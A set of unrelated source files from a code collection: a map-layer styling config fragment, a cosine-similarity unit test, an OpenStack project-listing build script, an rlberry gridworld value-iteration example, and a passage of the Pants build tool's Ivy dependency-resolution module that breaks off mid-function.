"ticks_every": 10,
"tick_labels": {
"50": {"prefix": ">"},
},
},
}
styles_c3_ls_list = [
style_ls_simple_rgb,
style_ls_irg,
style_ls_ndvi,
style_ls_ndwi,
style_ls_mndwi,
style_ls_pure_blue,
style_ls_pure_green,
style_ls_pure_red,
style_ls_pure_nir,
style_ls_pure_swir1,
style_ls_pure_swir2,
style_tmad_sdev_std,
style_tmad_edev_std,
style_tmad_bcdev_std,
style_tmad_rgb_std,
style_tmad_rgb_sens,
style_gm_count,
]
|
the-stack_106_16825
|
# Copyright (c) 2018 luozhouyang
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import unittest
from .cosine import Cosine
class TestCosine(unittest.TestCase):
def test_cosine(self):
cos = Cosine(1)
s = ['', ' ', 'Shanghai', 'ShangHai', 'Shang Hai']
for i in range(len(s)):
for j in range(i, len(s)):
print('dis between \'%s\' and \'%s\': %.4f' % (s[i], s[j], cos.distance(s[i], s[j])))
print('sim between \'%s\' and \'%s\': %.4f' % (s[i], s[j], cos.similarity(s[i], s[j])))
if __name__ == "__main__":
unittest.main()
|
the-stack_106_16828
|
import os
import sys
import yaml
VERSION = os.environ.get("VERSION", "latest")
OPENSTACK_VERSION = os.environ.get("OPENSTACK_VERSION", "latest")
BUILD_TYPE = os.environ.get("BUILD_TYPE", "all")
OPENSTACK_CORE_PROJECTS = [
"cinder",
"designate",
"glance",
"heat",
"horizon",
"keystone",
"neutron",
"nova",
"octavia",
"placement",
]
filename = "release/%s/openstack-%s.yml" % (VERSION, OPENSTACK_VERSION)
with open(filename, "rb") as fp:
versions = yaml.load(fp, Loader=yaml.FullLoader)
projects = []
# http://stackoverflow.com/questions/38987/how-to-merge-two-python-dictionaries-in-a-single-expression
if BUILD_TYPE in ["all", "base"]:
all_projects = versions["openstack_projects"].copy()
all_projects.update(versions["infrastructure_projects"])
elif BUILD_TYPE == "openstack-core":
all_projects = [x for x in versions["openstack_projects"] if x in OPENSTACK_CORE_PROJECTS] # noqa: E501
elif BUILD_TYPE == "openstack-additional":
all_projects = [x for x in versions["openstack_projects"] if x not in OPENSTACK_CORE_PROJECTS] # noqa: E501
elif BUILD_TYPE == "infrastructure":
all_projects = versions["infrastructure_projects"]
del(all_projects["openstack-base"])
else:
print("BUILD_TYPE %s not supported" % BUILD_TYPE)
sys.exit(1)
for project in all_projects:
if "vpnaas" not in project and "lbaas" not in project:
projects.append(project)
print("^" + " ^".join(sorted(projects)))
|
the-stack_106_16830
|
from rlberry.envs.benchmarks.grid_exploration.nroom import NRoom
from rlberry.agents.dynprog import ValueIterationAgent
env = NRoom(nrooms=9,
remove_walls=False,
room_size=9,
initial_state_distribution='center',
include_traps=True)
horizon = env.observation_space.n
agent = ValueIterationAgent(env, gamma=0.999, horizon=horizon)
print("fitting...")
info = agent.fit()
print(info)
env.enable_rendering()
for _ in range(10):
state = env.reset()
for tt in range(horizon):
# action = agent.policy(state)
action = env.action_space.sample()
next_s, _, done, _ = env.step(action)
if done:
break
state = next_s
env.render()
|
the-stack_106_16835
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import json
import logging
import os
import pkgutil
import threading
import xml.etree.ElementTree as ET
from abc import abstractmethod
from builtins import object, open, str
from collections import OrderedDict, defaultdict, namedtuple
from functools import total_ordering
import six
from future.utils import PY3
from twitter.common.collections import OrderedSet
from pants.backend.jvm.subsystems.jar_dependency_management import (JarDependencyManagement,
PinnedJarArtifactSet)
from pants.backend.jvm.targets.exportable_jvm_library import ExportableJvmLibrary
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.base.generator import Generator, TemplateData
from pants.base.revision import Revision
from pants.build_graph.target import Target
from pants.ivy.bootstrapper import Bootstrapper
from pants.java.jar.exclude import Exclude
from pants.java.jar.jar_dependency import JarDependency
from pants.java.jar.jar_dependency_utils import M2Coordinate, ResolvedJar
from pants.java.util import execute_runner
from pants.util.dirutil import safe_concurrent_creation, safe_mkdir, safe_open
from pants.util.fileutil import atomic_copy, safe_hardlink_or_copy
class IvyResolutionStep(object):
"""Ivy specific class for describing steps of performing resolution."""
# NB(nh): This class is the base class for the ivy resolve and fetch steps.
# It also specifies the abstract methods that define the components of resolution steps.
def __init__(self, confs, hash_name, pinned_artifacts, soft_excludes, ivy_resolution_cache_dir,
ivy_repository_cache_dir, global_ivy_workdir):
"""
:param confs: A tuple of string ivy confs to resolve for.
:param hash_name: A unique string name for this resolve.
:param pinned_artifacts: A tuple of "artifact-alikes" to force the versions of.
:param soft_excludes: A flag marking whether to pass excludes to Ivy or to apply them after the
fact.
:param ivy_repository_cache_dir: The cache directory used by Ivy for repository cache data.
:param ivy_resolution_cache_dir: The cache directory used by Ivy for resolution cache data.
:param global_ivy_workdir: The workdir that all ivy outputs live in.
"""
self.confs = confs
self.hash_name = hash_name
self.pinned_artifacts = pinned_artifacts
self.soft_excludes = soft_excludes
self.ivy_repository_cache_dir = ivy_repository_cache_dir
self.ivy_resolution_cache_dir = ivy_resolution_cache_dir
self.global_ivy_workdir = global_ivy_workdir
self.workdir_reports_by_conf = {c: self.resolve_report_path(c) for c in confs}
@abstractmethod
def required_load_files_exist(self):
"""The files required to load a previous resolve exist."""
@abstractmethod
def required_exec_files_exist(self):
"""The files to do a resolve exist."""
@abstractmethod
def load(self, targets):
"""Loads the result of a resolve or fetch."""
@abstractmethod
def exec_and_load(self, executor, extra_args, targets, jvm_options, workunit_name,
workunit_factory):
"""Runs the resolve or fetch and loads the result, returning it."""
@property
def workdir(self):
return os.path.join(self.global_ivy_workdir, self.hash_name)
@property
def hardlink_classpath_filename(self):
return os.path.join(self.workdir, 'classpath')
@property
def ivy_cache_classpath_filename(self):
return '{}.raw'.format(self.hardlink_classpath_filename)
@property
def frozen_resolve_file(self):
return os.path.join(self.workdir, 'resolution.json')
@property
def hardlink_dir(self):
return os.path.join(self.global_ivy_workdir, 'jars')
@abstractmethod
def ivy_xml_path(self):
"""Ivy xml location."""
@abstractmethod
def resolve_report_path(self, conf):
"""Location of the resolve report in the workdir."""
def _construct_and_load_hardlink_map(self):
artifact_paths, hardlink_map = IvyUtils.construct_and_load_hardlink_map(
self.hardlink_dir,
self.ivy_repository_cache_dir,
self.ivy_cache_classpath_filename,
self.hardlink_classpath_filename)
return artifact_paths, hardlink_map
def _call_ivy(self, executor, extra_args, ivyxml, jvm_options, hash_name_for_report,
workunit_factory, workunit_name):
IvyUtils.do_resolve(executor,
extra_args,
ivyxml,
jvm_options,
self.workdir_reports_by_conf,
self.confs,
self.ivy_resolution_cache_dir,
self.ivy_cache_classpath_filename,
hash_name_for_report,
workunit_factory,
workunit_name)
class IvyFetchStep(IvyResolutionStep):
"""Resolves ivy artifacts using the coordinates from a previous resolve."""
def required_load_files_exist(self):
return (all(os.path.isfile(report) for report in self.workdir_reports_by_conf.values()) and
os.path.isfile(self.ivy_cache_classpath_filename) and
os.path.isfile(self.frozen_resolve_file))
def resolve_report_path(self, conf):
return os.path.join(self.workdir, 'fetch-report-{}.xml'.format(conf))
@property
def ivy_xml_path(self):
return os.path.join(self.workdir, 'fetch-ivy.xml')
def required_exec_files_exist(self):
return os.path.isfile(self.frozen_resolve_file)
def load(self, targets):
try:
frozen_resolutions = FrozenResolution.load_from_file(self.frozen_resolve_file,
targets)
except Exception as e:
logger.debug('Failed to load {}: {}'.format(self.frozen_resolve_file, e))
return NO_RESOLVE_RUN_RESULT
return self._load_from_fetch(frozen_resolutions)
def exec_and_load(self, executor, extra_args, targets, jvm_options, workunit_name,
workunit_factory):
try:
frozen_resolutions = FrozenResolution.load_from_file(self.frozen_resolve_file,
targets)
except Exception as e:
logger.debug('Failed to load {}: {}'.format(self.frozen_resolve_file, e))
return NO_RESOLVE_RUN_RESULT
self._do_fetch(executor, extra_args, frozen_resolutions, jvm_options,
workunit_name, workunit_factory)
result = self._load_from_fetch(frozen_resolutions)
if not result.all_linked_artifacts_exist():
raise IvyResolveMappingError(
'Some artifacts were not linked to {} for {}'.format(self.global_ivy_workdir,
result))
return result
def _load_from_fetch(self, frozen_resolutions):
artifact_paths, hardlink_map = self._construct_and_load_hardlink_map()
return IvyFetchResolveResult(artifact_paths,
hardlink_map,
self.hash_name,
self.workdir_reports_by_conf,
frozen_resolutions)
def _do_fetch(self, executor, extra_args, frozen_resolution, jvm_options, workunit_name,
workunit_factory):
# It's important for fetches to have a different ivy report from resolves as their
# contents differ.
hash_name_for_report = '{}-fetch'.format(self.hash_name)
ivyxml = self.ivy_xml_path
self._prepare_ivy_xml(frozen_resolution, ivyxml, hash_name_for_report)
self._call_ivy(executor, extra_args, ivyxml, jvm_options, hash_name_for_report,
workunit_factory, workunit_name)
def _prepare_ivy_xml(self, frozen_resolution, ivyxml, resolve_hash_name_for_report):
# NB(nh): Our ivy.xml ensures that we always get the default configuration, even if it's not
# part of the requested confs.
default_resolution = frozen_resolution.get('default')
if default_resolution is None:
raise IvyUtils.IvyError("Couldn't find the frozen resolution for the 'default' ivy conf.")
try:
jars = default_resolution.jar_dependencies
IvyUtils.generate_fetch_ivy(jars, ivyxml, self.confs, resolve_hash_name_for_report)
except Exception as e:
raise IvyUtils.IvyError('Failed to prepare ivy resolve: {}'.format(e))
class IvyResolveStep(IvyResolutionStep):
"""Resolves ivy artifacts and produces a cacheable file containing the resulting coordinates."""
def required_load_files_exist(self):
return (all(os.path.isfile(report) for report in self.workdir_reports_by_conf.values()) and
os.path.isfile(self.ivy_cache_classpath_filename))
def resolve_report_path(self, conf):
return os.path.join(self.workdir, 'resolve-report-{}.xml'.format(conf))
@property
def ivy_xml_path(self):
return os.path.join(self.workdir, 'resolve-ivy.xml')
def load(self, targets):
artifact_paths, hardlink_map = self._construct_and_load_hardlink_map()
return IvyResolveResult(artifact_paths,
hardlink_map,
self.hash_name,
self.workdir_reports_by_conf)
def exec_and_load(self, executor, extra_args, targets, jvm_options,
workunit_name, workunit_factory):
self._do_resolve(executor, extra_args, targets, jvm_options, workunit_name, workunit_factory)
result = self.load(targets)
if not result.all_linked_artifacts_exist():
raise IvyResolveMappingError(
'Some artifacts were not linked to {} for {}'.format(self.global_ivy_workdir,
result))
frozen_resolutions_by_conf = result.get_frozen_resolutions_by_conf(targets)
FrozenResolution.dump_to_file(self.frozen_resolve_file, frozen_resolutions_by_conf)
return result
def _do_resolve(self, executor, extra_args, targets, jvm_options, workunit_name, workunit_factory):
ivyxml = self.ivy_xml_path
hash_name = '{}-resolve'.format(self.hash_name)
self._prepare_ivy_xml(targets, ivyxml, hash_name)
self._call_ivy(executor, extra_args, ivyxml, jvm_options, hash_name,
workunit_factory, workunit_name)
def _prepare_ivy_xml(self, targets, ivyxml, hash_name):
# TODO(John Sirois): merge the code below into IvyUtils or up here; either way, better
# diagnostics can be had in `IvyUtils.generate_ivy` if this is done.
# See: https://github.com/pantsbuild/pants/issues/2239
jars, global_excludes = IvyUtils.calculate_classpath(targets)
# Don't pass global excludes to ivy when using soft excludes.
if self.soft_excludes:
global_excludes = []
IvyUtils.generate_ivy(targets, jars, global_excludes, ivyxml, self.confs,
hash_name, self.pinned_artifacts)
class FrozenResolution(object):
"""Contains the abstracted results of a resolve.
With this we can do a simple fetch.
"""
# TODO(nh): include full dependency graph in here.
# So that we can inject it into the build graph if we want to.
class MissingTarget(Exception):
"""Thrown when a loaded resolution has a target spec for a target that doesn't exist."""
def __init__(self):
self.target_to_resolved_coordinates = defaultdict(OrderedSet)
self.all_resolved_coordinates = OrderedSet()
self.coordinate_to_attributes = OrderedDict()
@property
def jar_dependencies(self):
return [
JarDependency(c.org, c.name, c.rev, classifier=c.classifier, ext=c.ext,
**self.coordinate_to_attributes.get(c, {}))
for c in self.all_resolved_coordinates]
def add_resolved_jars(self, target, resolved_jars):
coords = [j.coordinate for j in resolved_jars]
self.add_resolution_coords(target, coords)
# Assuming target is a jar library.
for j in target.jar_dependencies:
url = j.get_url(relative=True)
if url:
self.coordinate_to_attributes[j.coordinate] = {'url': url, 'base_path': j.base_path}
else:
self.coordinate_to_attributes[j.coordinate] = {}
def add_resolution_coords(self, target, coords):
for c in coords:
self.target_to_resolved_coordinates[target].add(c)
self.all_resolved_coordinates.add(c)
def target_spec_to_coordinate_strings(self):
return {t.address.spec: [str(c) for c in coordinates]
for t, coordinates in self.target_to_resolved_coordinates.items()}
def __repr__(self):
return 'FrozenResolution(\n target_to_resolved_coordinates\n {}\n all\n {}'.format(
'\n '.join(': '.join([t.address.spec,
'\n '.join(str(c) for c in cs)])
for t,cs in self.target_to_resolved_coordinates.items()),
'\n '.join(str(c) for c in self.coordinate_to_attributes.keys())
)
def __eq__(self, other):
return (type(self) == type(other) and
self.all_resolved_coordinates == other.all_resolved_coordinates and
self.target_to_resolved_coordinates == other.target_to_resolved_coordinates)
def __ne__(self, other):
return not self == other
@classmethod
def load_from_file(cls, filename, targets):
if not os.path.exists(filename):
return None
with open(filename, 'r') as f:
# Using OrderedDict here to maintain insertion order of dict entries.
from_file = json.load(f, object_pairs_hook=OrderedDict)
result = {}
target_lookup = {t.address.spec: t for t in targets}
for conf, serialized_resolution in from_file.items():
resolution = FrozenResolution()
def m2_for(c):
return M2Coordinate.from_string(c)
for coord, attr_dict in serialized_resolution['coord_to_attrs'].items():
m2 = m2_for(coord)
resolution.coordinate_to_attributes[m2] = attr_dict
for spec, coord_strs in serialized_resolution['target_to_coords'].items():
t = target_lookup.get(spec, None)
if t is None:
raise cls.MissingTarget('Cannot find target for address {} in frozen resolution'
.format(spec))
resolution.add_resolution_coords(t, [m2_for(c) for c in coord_strs])
result[conf] = resolution
return result
@classmethod
def dump_to_file(cls, filename, resolutions_by_conf):
res = {}
for conf, resolution in resolutions_by_conf.items():
res[conf] = OrderedDict([
['target_to_coords',resolution.target_spec_to_coordinate_strings()],
['coord_to_attrs', OrderedDict([str(c), attrs]
for c, attrs in resolution.coordinate_to_attributes.items())]
])
with safe_concurrent_creation(filename) as tmp_filename:
mode = 'w' if PY3 else 'wb'
with open(tmp_filename, mode) as f:
json.dump(res, f)
class IvyResolveResult(object):
"""The result of an Ivy resolution.
The result data includes the list of resolved artifacts, the relationships between those artifacts
and the targets that requested them and the hash name of the resolve.
"""
def __init__(self, resolved_artifact_paths, hardlink_map, resolve_hash_name, reports_by_conf):
self._reports_by_conf = reports_by_conf
self.resolved_artifact_paths = resolved_artifact_paths
self.resolve_hash_name = resolve_hash_name
self._hardlink_map = hardlink_map
@property
def has_resolved_artifacts(self):
"""The requested targets have a resolution associated with them."""
return self.resolve_hash_name is not None
def all_linked_artifacts_exist(self):
"""All of the artifact paths for this resolve point to existing files."""
if not self.has_resolved_artifacts:
return False
for path in self.resolved_artifact_paths:
if not os.path.isfile(path):
return False
else:
return True
def report_for_conf(self, conf):
"""Returns the path to the ivy report for the provided conf.
Returns None if there is no path.
"""
return self._reports_by_conf.get(conf)
def get_frozen_resolutions_by_conf(self, targets):
frozen_resolutions_by_conf = OrderedDict()
for conf in self._reports_by_conf:
frozen_resolution = FrozenResolution()
for target, resolved_jars in self.resolved_jars_for_each_target(conf, targets):
frozen_resolution.add_resolved_jars(target, resolved_jars)
frozen_resolutions_by_conf[conf] = frozen_resolution
return frozen_resolutions_by_conf
def resolved_jars_for_each_target(self, conf, targets):
"""Yields the resolved jars for each passed JarLibrary.
If there is no report for the requested conf, yields nothing.
:param conf: The ivy conf to load jars for.
:param targets: The collection of JarLibrary targets to find resolved jars for.
:yield: target, resolved_jars
:raises IvyTaskMixin.UnresolvedJarError
"""
ivy_info = self._ivy_info_for(conf)
if not ivy_info:
return
jar_library_targets = [t for t in targets if isinstance(t, JarLibrary)]
ivy_jar_memo = {}
for target in jar_library_targets:
# Add the artifacts from each dependency module.
resolved_jars = self._resolved_jars_with_hardlinks(conf, ivy_info, ivy_jar_memo,
self._jar_dependencies_for_target(conf,
target),
target)
yield target, resolved_jars
def _jar_dependencies_for_target(self, conf, target):
return target.jar_dependencies
def _ivy_info_for(self, conf):
report_path = self._reports_by_conf.get(conf)
return IvyUtils.parse_xml_report(conf, report_path)
def _new_resolved_jar_with_hardlink_path(self, conf, target, resolved_jar_without_hardlink):
def candidate_cache_paths():
# There is a focus on being lazy here to avoid `os.path.realpath` when we can.
yield resolved_jar_without_hardlink.cache_path
yield os.path.realpath(resolved_jar_without_hardlink.cache_path)
for cache_path in candidate_cache_paths():
pants_path = self._hardlink_map.get(cache_path)
if pants_path:
break
else:
raise IvyResolveMappingError(
'Jar {resolved_jar} in {spec} not resolved to the ivy '
'hardlink map in conf {conf}.'
.format(spec=target.address.spec,
resolved_jar=resolved_jar_without_hardlink.cache_path,
conf=conf))
return ResolvedJar(coordinate=resolved_jar_without_hardlink.coordinate,
pants_path=pants_path,
cache_path=resolved_jar_without_hardlink.cache_path)
def _resolved_jars_with_hardlinks(self, conf, ivy_info, ivy_jar_memo, coordinates, target):
raw_resolved_jars = ivy_info.get_resolved_jars_for_coordinates(coordinates,
memo=ivy_jar_memo)
resolved_jars = [self._new_resolved_jar_with_hardlink_path(conf, target, raw_resolved_jar)
for raw_resolved_jar in raw_resolved_jars]
return resolved_jars
class IvyFetchResolveResult(IvyResolveResult):
"""A resolve result that uses the frozen resolution to look up dependencies."""
def __init__(self, resolved_artifact_paths, hardlink_map, resolve_hash_name, reports_by_conf,
frozen_resolutions):
super(IvyFetchResolveResult, self).__init__(resolved_artifact_paths, hardlink_map,
resolve_hash_name, reports_by_conf)
self._frozen_resolutions = frozen_resolutions
def _jar_dependencies_for_target(self, conf, target):
return self._frozen_resolutions[conf].target_to_resolved_coordinates.get(target, ())
NO_RESOLVE_RUN_RESULT = IvyResolveResult([], {}, None, {})
IvyModule = namedtuple('IvyModule', ['ref', 'artifact', 'callers'])
Dependency = namedtuple('DependencyAttributes',
['org', 'name', 'rev', 'mutable', 'force', 'transitive'])
Artifact = namedtuple('Artifact', ['name', 'type_', 'ext', 'url', 'classifier'])
logger = logging.getLogger(__name__)
class IvyResolveMappingError(Exception):
"""Raised when there is a failure mapping the ivy resolve results to pants objects."""
@total_ordering
class IvyModuleRef(object):
"""
:API: public
"""
# latest.integration is ivy magic meaning "just get the latest version"
_ANY_REV = 'latest.integration'
def __init__(self, org, name, rev, classifier=None, ext=None):
self.org = org
self.name = name
self.rev = rev
self.classifier = classifier
self.ext = ext or 'jar'
self._id = (self.org, self.name, self.rev, self.classifier, self.ext)
def __eq__(self, other):
return isinstance(other, IvyModuleRef) and self._id == other._id
# TODO(python3port): Return NotImplemented if other does not have attributes
def __lt__(self, other):
# We can't just re-use __repr__ or __str_ because we want to order rev last
return ((self.org, self.name, self.classifier or '', self.ext, self.rev) <
(other.org, other.name, other.classifier or '', other.ext, other.rev))
def __hash__(self):
return hash(self._id)
def __str__(self):
return 'IvyModuleRef({})'.format(':'.join((x or '') for x in self._id))
def __repr__(self):
return ('IvyModuleRef(org={!r}, name={!r}, rev={!r}, classifier={!r}, ext={!r})'
.format(*self._id))
@property
def caller_key(self):
"""This returns an identifier for an IvyModuleRef that only retains the caller org and name.
Ivy represents dependees as `<caller/>`'s with just org and name and rev information.
This method returns a `<caller/>` representation of the current ref.
"""
return IvyModuleRef(name=self.name, org=self.org, rev=self._ANY_REV)
@property
def unversioned(self):
"""This returns an identifier for an IvyModuleRef without version information.
It's useful because ivy might return information about a different version of a dependency than
the one we request, and we want to ensure that all requesters of any version of that dependency
are able to learn about it.
"""
return IvyModuleRef(name=self.name, org=self.org, rev=self._ANY_REV, classifier=self.classifier,
ext=self.ext)
class IvyInfo(object):
"""
:API: public
"""
def __init__(self, conf):
self._conf = conf
self.modules_by_ref = {} # Map from ref to referenced module.
self.refs_by_unversioned_refs = {} # Map from unversioned ref to the resolved versioned ref
# Map from ref of caller to refs of modules required by that caller.
self._deps_by_caller = defaultdict(OrderedSet)
# Map from _unversioned_ ref to OrderedSet of IvyArtifact instances.
self._artifacts_by_ref = defaultdict(OrderedSet)
def add_module(self, module):
if not module.artifact:
# Module was evicted, so do not record information about it
return
ref_unversioned = module.ref.unversioned
if ref_unversioned in self.refs_by_unversioned_refs:
raise IvyResolveMappingError('Already defined module {}, as rev {}!'
.format(ref_unversioned, module.ref.rev))
if module.ref in self.modules_by_ref:
raise IvyResolveMappingError('Already defined module {}, would be overwritten!'
.format(module.ref))
self.refs_by_unversioned_refs[ref_unversioned] = module.ref
self.modules_by_ref[module.ref] = module
for caller in module.callers:
self._deps_by_caller[caller.caller_key].add(module.ref)
self._artifacts_by_ref[ref_unversioned].add(module.artifact)
def _do_traverse_dependency_graph(self, ref, collector, memo, visited):
memoized_value = memo.get(ref)
if memoized_value:
return memoized_value
if ref in visited:
# Ivy allows for circular dependencies
# If we're here, that means we're resolving something that
# transitively depends on itself
return set()
visited.add(ref)
acc = collector(ref)
# NB(zundel): ivy does not return deps in a consistent order for the same module for
# different resolves. Sort them to get consistency and prevent cache invalidation.
# See https://github.com/pantsbuild/pants/issues/2607
deps = sorted(self._deps_by_caller.get(ref.caller_key, ()))
for dep in deps:
acc.update(self._do_traverse_dependency_graph(dep, collector, memo, visited))
memo[ref] = acc
return acc
def traverse_dependency_graph(self, ref, collector, memo=None):
"""Traverses module graph, starting with ref, collecting values for each ref into the sets
created by the collector function.
:param ref an IvyModuleRef to start traversing the ivy dependency graph
:param collector a function that takes a ref and returns a new set of values to collect for
that ref, which will also be updated with all the dependencies accumulated values
:param memo is a dict of ref -> set that memoizes the results of each node in the graph.
If provided, allows for retaining cache across calls.
:returns the accumulated set for ref
"""
resolved_ref = self.refs_by_unversioned_refs.get(ref.unversioned)
if resolved_ref:
ref = resolved_ref
if memo is None:
memo = dict()
visited = set()
return self._do_traverse_dependency_graph(ref, collector, memo, visited)
def get_resolved_jars_for_coordinates(self, coordinates, memo=None):
"""Collects jars for the passed coordinates.
Because artifacts are only fetched for the "winning" version of a module, the artifacts
will not always represent the version originally declared by the library.
This method is transitive within the passed coordinates dependencies.
:param coordinates collections.Iterable: Collection of coordinates to collect transitive
resolved jars for.
:param memo: See `traverse_dependency_graph`.
:returns: All the artifacts for all of the jars for the provided coordinates,
including transitive dependencies.
:rtype: list of :class:`pants.java.jar.ResolvedJar`
"""
def to_resolved_jar(jar_ref, jar_path):
return ResolvedJar(coordinate=M2Coordinate(org=jar_ref.org,
name=jar_ref.name,
rev=jar_ref.rev,
classifier=jar_ref.classifier,
ext=jar_ref.ext),
cache_path=jar_path)
resolved_jars = OrderedSet()
def create_collection(dep):
return OrderedSet([dep])
for jar in coordinates:
classifier = jar.classifier if self._conf == 'default' else self._conf
jar_module_ref = IvyModuleRef(jar.org, jar.name, jar.rev, classifier, jar.ext)
for module_ref in self.traverse_dependency_graph(jar_module_ref, create_collection, memo):
for artifact_path in self._artifacts_by_ref[module_ref.unversioned]:
resolved_jars.add(to_resolved_jar(module_ref, artifact_path))
return resolved_jars
def __repr__(self):
return 'IvyInfo(conf={}, refs={})'.format(self._conf, self.modules_by_ref.keys())
class IvyUtils(object):
"""Useful methods related to interaction with ivy.
:API: public
"""
# Protects ivy executions.
_ivy_lock = threading.RLock()
# Protect writes to the global map of jar path -> hardlinks to that jar.
_hardlink_map_lock = threading.Lock()
INTERNAL_ORG_NAME = 'internal'
class IvyError(Exception):
"""Indicates an error preparing an ivy operation."""
class IvyResolveReportError(IvyError):
"""Indicates that an ivy report cannot be found."""
class IvyResolveConflictingDepsError(IvyError):
"""Indicates two or more locally declared dependencies conflict."""
class BadRevisionError(IvyError):
"""Indicates an unparseable version number."""
@staticmethod
def _generate_exclude_template(exclude):
return TemplateData(org=exclude.org, name=exclude.name)
@staticmethod
def _generate_override_template(jar):
return TemplateData(org=jar.org, module=jar.name, version=jar.rev)
@staticmethod
def _load_classpath_from_cachepath(path):
if not os.path.exists(path):
return []
else:
with safe_open(path, 'r') as cp:
return [_f for _f in (path.strip() for path in cp.read().split(os.pathsep)) if _f]
@classmethod
def do_resolve(cls, executor, extra_args, ivyxml, jvm_options, workdir_report_paths_by_conf,
confs, ivy_resolution_cache_dir, ivy_cache_classpath_filename, resolve_hash_name,
workunit_factory, workunit_name):
"""Execute Ivy with the given ivy.xml and copies all relevant files into the workdir.
This method does an Ivy resolve, which may be either a Pants resolve or a Pants fetch depending
on whether there is an existing frozen resolution.
After it is run, the Ivy reports are copied into the workdir at the paths specified by
workdir_report_paths_by_conf along with a file containing a list of all the requested artifacts
and their transitive dependencies.
:param executor: A JVM executor to use to invoke ivy.
:param extra_args: Extra arguments to pass to ivy.
:param ivyxml: The input ivy.xml containing the dependencies to resolve.
:param jvm_options: A list of jvm option strings to use for the ivy invoke, or None.
:param workdir_report_paths_by_conf: A dict mapping confs to report paths in the workdir.
:param confs: The confs used in the resolve.
:param resolve_hash_name: The hash to use as the module name for finding the ivy report file.
:param workunit_factory: A workunit factory for the ivy invoke, or None.
:param workunit_name: A workunit name for the ivy invoke, or None.
"""
ivy = Bootstrapper.default_ivy(bootstrap_workunit_factory=workunit_factory)
with safe_concurrent_creation(ivy_cache_classpath_filename) as raw_target_classpath_file_tmp:
extra_args = extra_args or []
args = ['-cachepath', raw_target_classpath_file_tmp] + extra_args
with cls._ivy_lock:
cls._exec_ivy(ivy, confs, ivyxml, args,
jvm_options=jvm_options,
executor=executor,
workunit_name=workunit_name,
workunit_factory=workunit_factory)
if not os.path.exists(raw_target_classpath_file_tmp):
raise cls.IvyError('Ivy failed to create classpath file at {}'
.format(raw_target_classpath_file_tmp))
cls._copy_ivy_reports(workdir_report_paths_by_conf, confs, ivy_resolution_cache_dir, resolve_hash_name)
logger.debug('Moved ivy classfile file to {dest}'
.format(dest=ivy_cache_classpath_filename))
@classmethod
def _copy_ivy_reports(cls, workdir_report_paths_by_conf, confs, ivy_resolution_cache_dir, resolve_hash_name):
for conf in confs:
ivy_cache_report_path = IvyUtils.xml_report_path(ivy_resolution_cache_dir, resolve_hash_name,
conf)
workdir_report_path = workdir_report_paths_by_conf[conf]
try:
atomic_copy(ivy_cache_report_path,
workdir_report_path)
except IOError as e:
raise cls.IvyError('Failed to copy report into workdir from {} to {}: {}'
.format(ivy_cache_report_path, workdir_report_path, e))
@classmethod
def _exec_ivy(cls, ivy, confs, ivyxml, args, jvm_options, executor,
workunit_name, workunit_factory):
ivy = ivy or Bootstrapper.default_ivy()
ivy_args = ['-ivy', ivyxml]
ivy_args.append('-confs')
ivy_args.extend(confs)
ivy_args.extend(args)
ivy_jvm_options = list(jvm_options)
# Disable cache in File.getCanonicalPath(), makes Ivy work with -symlink option properly on ng.
ivy_jvm_options.append('-Dsun.io.useCanonCaches=false')
runner = ivy.runner(jvm_options=ivy_jvm_options, args=ivy_args, executor=executor)
try:
with ivy.resolution_lock:
result = execute_runner(runner, workunit_factory=workunit_factory,
workunit_name=workunit_name)
if result != 0:
raise IvyUtils.IvyError('Ivy returned {result}. cmd={cmd}'.format(result=result,
cmd=runner.cmd))
except runner.executor.Error as e:
raise IvyUtils.IvyError(e)
@classmethod
def construct_and_load_hardlink_map(cls, hardlink_dir, ivy_repository_cache_dir,
ivy_cache_classpath_filename, hardlink_classpath_filename):
# Make our actual classpath be hardlinks, so that the paths are uniform across systems.
# Note that we must do this even if we read the raw_target_classpath_file from the artifact
# cache. If we cache the target_classpath_file we won't know how to create the hardlinks.
with IvyUtils._hardlink_map_lock:
# A common dir for hardlinks into the ivy2 cache. This ensures that paths to jars
# in artifact-cached analysis files are consistent across systems.
# Note that we have one global, well-known hardlink dir, again so that paths are
# consistent across builds.
hardlink_map = cls._hardlink_cachepath(ivy_repository_cache_dir,
ivy_cache_classpath_filename,
hardlink_dir,
hardlink_classpath_filename)
classpath = cls._load_classpath_from_cachepath(hardlink_classpath_filename)
return classpath, hardlink_map
@classmethod
def _hardlink_cachepath(cls, ivy_repository_cache_dir, inpath, hardlink_dir, outpath):
"""hardlinks all paths listed in inpath that are under ivy_repository_cache_dir into hardlink_dir.
If there is an existing hardlink for a file under inpath, it is used rather than creating
a new hardlink. Preserves all other paths. Writes the resulting paths to outpath.
Returns a map of path -> hardlink to that path.
"""
safe_mkdir(hardlink_dir)
# The ivy_repository_cache_dir might itself be a hardlink. In this case, ivy may return paths that
# reference the realpath of the .jar file after it is resolved in the cache dir. To handle
# this case, add both the hardlink'ed path and the realpath to the jar to the hardlink map.
real_ivy_cache_dir = os.path.realpath(ivy_repository_cache_dir)
hardlink_map = OrderedDict()
inpaths = cls._load_classpath_from_cachepath(inpath)
paths = OrderedSet([os.path.realpath(path) for path in inpaths])
for path in paths:
if path.startswith(real_ivy_cache_dir):
hardlink_map[path] = os.path.join(hardlink_dir, os.path.relpath(path, real_ivy_cache_dir))
else:
# This path is outside the cache. We won't hardlink it.
hardlink_map[path] = path
# Create hardlinks for paths in the ivy cache dir.
